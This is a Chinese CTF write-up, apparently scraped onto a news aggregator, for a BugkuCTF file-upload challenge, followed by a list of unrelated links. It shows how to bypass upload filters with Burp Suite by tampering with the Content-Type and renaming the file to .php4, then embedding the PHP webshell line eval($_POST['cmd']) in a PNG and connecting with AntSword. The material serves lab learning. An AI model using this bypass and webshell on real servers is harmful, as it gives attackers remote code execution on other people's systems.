当前位置: 首页 > news >正文

bugkuctf-web-文件上传(kali操作)

一、题目描述:

二、启动场景

My name is margin,give me a image file not a php

可以上传图片但不可以上传php文件,说明存在三个过滤:

  • 请求头部的 Content-Type
  • 文件后缀
  • 请求数据的Content-Type

三、解题流程

1、上传文件就想到可以用burpsuite抓包修改数据,先在本地找个截图上传(建议截图小一点,一小块就行),点击submit的时候开始抓包,并右键选择send to repeat送到repeat模块

2.修改请求头

请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data
所上传的文件后缀 改为 .php4
请求数据的Content-Type 内容改为 image /jpeg

在PNG文件末尾添加一句木马:<?php eval($_POST['cmd']); ?>

3.重新发送请求后的数据

数据修改好后点击send发送,会显示4.打开蚁剑进行连接

右键点击添加数据,注意URL地址不要有额外的参数(只有IP地址和bp返回的链接),密码是木马里面的参数,这里是cmd。最后最后最后,一定记得点添加!!!

5.找flag

双击进入,回到根目录,找到flag,双击打开即可获得四、声明

这篇文章是我首次所创,格式不太美观请将就一下,主要是因为我看其他人的答题心得对新手来说(别问我咋看出来的,我就是新手)不太容易理解和操作,所以就结合一些他们的心得进行创作。

http://www.jsqmd.com/news/918500/

相关文章:

  • Mac重装系统卡在“最后1秒”?别慌,这可能是APFS格式和安装时间预估的锅
  • 新 E 选品牌源头厂家无溶剂 PU 烤火罩耐刮耐磨吗
  • 2026年5月AI模型性能排行:代码能力Claude霸榜,智谱GLM杀入前十
  • 实习19-HRM
  • 告别排版焦虑:西安交大LaTeX论文模板让你专注学术创新
  • 【电赛保姆级教程】别再用L298N了!电赛电机驱动与高阶控制(带FOC扫盲)硬核避坑指南
  • LabVIEW与外部设备通信秘籍:用DLL传递复杂结构体(含数组/嵌套结构)的完整配置流程
  • 端渲染与流渲染的融合之道:数字孪生应用开发套件的工程选型思路
  • windows 常见的cmd备忘录
  • 从Remy到3D空间影像壁纸,鸿蒙3DGS的差异性体验,凭什么得到消费者的认可?
  • Windows Defender彻底移除终极指南:2025免费工具完整教程
  • 那些年,我追Google Trends追到精疲力尽的故事
  • YOLOv11地铁站台与候车室行李目标检测数据集-153张-suitcase-1_6
  • 「斯隆奖」得主戴亮全职加盟复旦
  • 2026年郑州企业AI获客难?盘点5家GEO优化服务商特点 - 资讯快报
  • 多塔柱混凝土矮塔斜拉桥结构解析方案【附数据】
  • Transformer架构深度解析:从原理到实践的全面指南
  • AI工具学习不是学软件,而是重构工作流:1套可迁移能力框架+5类岗位适配方案
  • 【多模态评测】图生文/文生图模型怎么测?多模态评测集 CLIP Score 介绍
  • 188、运动控制中的行业应用:电子装配与贴片机
  • 口袋神器!Arduino 创客必备,可接入 DeepSeek、Qwen 等 AI 大模型,通过 GPIO 串口控制 IoT 智能设备
  • 深入FIO引擎:除了libaio,这些ioengine(如sync, psync, mmap)在Linux下到底怎么选?性能差多少?
  • 终极键盘连击修复指南:Keyboard Chatter Blocker 专业防抖工具完全教程
  • NoFences:免费开源的Windows桌面分区神器终极指南
  • C++之父开撕AI Coding:资深开发者宁愿退休也不愿伺候AI生成的代码
  • C# 泛型
  • Rusted PackFile Manager:全面战争MOD开发的终极效率工具完整教程
  • 为什么你的论文参考文献格式总是不对?3个GB/T 7714 BibTeX样式终极解决方案
  • IF=10.0!浙大博士一作再登柳叶刀子刊!
  • 如何快速修改暗黑破坏神2存档:5分钟掌握d2s-editor完整使用指南